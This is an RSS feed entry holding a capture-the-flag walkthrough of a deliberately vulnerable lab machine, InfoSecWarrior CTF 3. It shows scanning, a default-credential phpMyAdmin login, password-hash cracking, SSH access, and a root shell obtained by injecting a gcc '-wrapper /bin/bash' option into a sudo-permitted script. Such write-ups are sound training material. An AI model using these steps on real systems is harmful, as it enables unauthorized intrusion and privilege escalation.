<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>armour infosec Archives - Armour Infosec</title>
	<atom:link href="https://www.armourinfosec.com/tag/armour-infosec/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.armourinfosec.com/tag/armour-infosec/</link>
	<description>Do Your Part - Be Security Smart</description>
	<lastBuildDate>Fri, 10 Apr 2020 03:56:08 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.3.1</generator>

<image>
	<url>https://www.armourinfosec.com/wp-content/uploads/2018/02/ai.png</url>
	<title>armour infosec Archives - Armour Infosec</title>
	<link>https://www.armourinfosec.com/tag/armour-infosec/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>InfoSecWarrior CTF: 3 Walkthrough</title>
		<link>https://www.armourinfosec.com/infosecwarrior-ctf-3-walkthrough/</link>
					<comments>https://www.armourinfosec.com/infosecwarrior-ctf-3-walkthrough/#respond</comments>
		
		<dc:creator><![CDATA[Armour Infosec]]></dc:creator>
		<pubDate>Thu, 09 Apr 2020 18:25:45 +0000</pubDate>
				<category><![CDATA[Walkthrough]]></category>
		<category><![CDATA[armour infosec]]></category>
		<category><![CDATA[ctf]]></category>
		<category><![CDATA[infosec warrior]]></category>
		<category><![CDATA[infosec warrior 3]]></category>
		<category><![CDATA[vulnhub]]></category>
		<category><![CDATA[walkthrough]]></category>
		<guid isPermaLink="false">https://www.armourinfosec.com/?p=26013</guid>

					<description><![CDATA[<p>Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by...</p>
<p>The post <a rel="nofollow" href="https://www.armourinfosec.com/infosecwarrior-ctf-3-walkthrough/">InfoSecWarrior CTF: 3 Walkthrough</a> appeared first on <a rel="nofollow" href="https://www.armourinfosec.com/">Armour Infosec</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Here is the new challenge of <a href="https://www.infosecwarrior.com/infosecwarrior-ctf-2020-3/"><strong>InfoSecWarrior CTF: 3 Walkthrough</strong></a> by <a href="https://www.infosecwarrior.com/">Infosec Warrior CTF 2020</a>. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to the author, a WordPress developer configured the machine to work internally, but due to a misconfiguration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.</p>
<p><img decoding="async" fetchpriority="high" class="alignnone wp-image-26026 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-09-07-53.png" alt="" width="800" height="522" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-09-07-53.png 800w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-09-07-53-300x196.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Screenshot-from-2020-04-10-09-07-53-768x501.png 768w" sizes="(max-width: 800px) 100vw, 800px" /></p>
<h3>Pentester Methodology</h3>
<h5>Network Scanning</h5>
<ul>
<li>Netdiscover</li>
<li>Nmap</li>
</ul>
<h5>Enumeration</h5>
<ul>
<li>Nikto</li>
<li>phpMyAdmin</li>
<li>John</li>
<li>SSH</li>
</ul>
<h5>Privilege Escalation</h5>
<ul>
<li>Sudo -l</li>
<li>gcc compilation</li>
</ul>
<h3>Network Scanning</h3>
<p>We start with <strong>Netdiscover</strong> to obtain the IP address of the target, as follows:</p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">#netdiscover -i vboxnet0
	 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                                                                                                            
                                                                                                                                                                                                
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH
</pre>
<p>Got the machine IP <strong>192.168.2.17</strong>; now let us scan it with <strong>Nmap.</strong></p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">#nmap -p- -A -O 192.168.2.17
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 18:53 IST
Nmap scan report for 192.168.2.17
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
MAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)</pre>
<h3>Enumeration</h3>
<p>On visiting the web page we see a WordPress site. But the WordPress site does not work properly (it shows an error), so we moved on to our next step.</p>
<p><img decoding="async" class="alignnone wp-image-26015 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-082625.jpg" alt="" width="537" height="677" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-082625.jpg 537w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-082625-238x300.jpg 238w" sizes="(max-width: 537px) 100vw, 537px" /></p>
<p>So I fired up <strong>Nikto</strong> and found a <strong>phpMyAdmin page.</strong></p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">#nikto -h http://192.168.2.17/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.17
+ Target Hostname:    192.168.2.17
+ Target Port:        80
+ Start Time:         2020-04-09 18:55:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: &lt;http://127.0.0.1/index.php/wp-json/&gt;; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2020-04-09 18:56:16 (GMT5.5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested</pre>
<p>So I logged in to phpMyAdmin with the credentials <strong>root:root</strong>, and it was a success.</p>
<p><img decoding="async" class="alignnone wp-image-26016 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083215.jpg" alt="InfoSecWarrior CTF: 3 Walkthrough" width="841" height="494" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083215.jpg 841w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083215-300x176.jpg 300w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083215-768x451.jpg 768w" sizes="(max-width: 841px) 100vw, 841px" /></p>
<p>After successfully logging in as the MySQL root user, I selected the wpdb database and opened the wp-user table, where we see two user entries, Krishna and user1, as shown in the image below.</p>
<p><img decoding="async" class="alignnone wp-image-26017 size-large" src="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083316-1024x460.jpg" alt="InfoSecWarrior CTF: 3 Walkthrough" width="1024" height="460" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083316-1024x460.jpg 1024w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083316-300x135.jpg 300w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083316-768x345.jpg 768w, https://www.armourinfosec.com/wp-content/uploads/2020/04/Annotation-2020-04-09-083316.jpg 1160w" sizes="(max-width: 1024px) 100vw, 1024px" /></p>
<p>I copied the users' hashes into a text file and cracked them with the John tool using the following command:</p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
infosec					(?)
Session aborted

john --wordlist=/usr/share/wordlists/rockyou.txt user
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
user1					(?)
Session aborted</pre>
<p>The WordPress hashes are cracked successfully. I then tried to log in over SSH with the WordPress credentials and got a shell as Krishna (Krishna: infosec).</p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">#ssh krishna@192.168.2.17
The authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.
ECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.
krishna@192.168.2.17's password: 
krishna@ck05:~$ id 
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ hostname
ck05
krishna@ck05:~$ whoami 
krishna</pre>
<p>Got the shell.</p>
<h3>Privilege Escalation</h3>
<p>I ran the <strong>sudo -l</strong> command and found that <strong>Krishna</strong> has <strong>sudo</strong> permission to run a bash script as <strong>loopspell</strong>. This script compiles a <strong>C</strong> language file using <strong>gcc</strong>, and with the following command we escalate privileges on this machine.</p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
loopspell@ck05:~$ id 
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
loopspell@ck05:~$ hostname
ck05
loopspell@ck05:~$ whoami 
loopspell</pre>
<p>Running <strong>sudo -l</strong> again as loopspell, we see sudoers entries for <strong>/usr/bin/gcc</strong> and <strong>code_compiler.sh</strong>. Using sudo, I run the same privilege escalation command again and we have a root shell on the target machine.</p>
<pre class="toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true">loopspell@ck05:/home$ cd loopspell/
loopspell@ck05:/home/loopspell$ ls 
backup.c  backup.txt  code_compiler.sh	user.txt
loopspell@ck05:/home/loopspell$ cat user.txt 
a4e3fea7510e570f6964899eb764abdc
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh 
Code is being compiling ...
gcc: fatal error: no input files
compilation terminated.
You can find your compiled code in /tmp/ directory.
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
root@ck05:/home/loopspell# id 
uid=0(root) gid=0(root) groups=0(root)
root@ck05:/home/loopspell# hostname
ck05
root@ck05:/home/loopspell# whoami
root
root@ck05:/home/loopspell# passwd
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@ck05:/home/loopspell# cd 
root@ck05:~# ls
msg.txt
root@ck05:~# cd /root/
root@ck05:/root# ls
root.txt
root@ck05:/root# cat root
cat: root: No such file or directory
root@ck05:/root# cat root.txt 
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \&lt;   |  | | __ \_/ __ \_  __ \      &lt;  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  &gt;   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  &gt;__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 
root@ck05:/root# 
</pre>
<p>Eureka!!!! Got root.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.armourinfosec.com/infosecwarrior-ctf-3-walkthrough/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
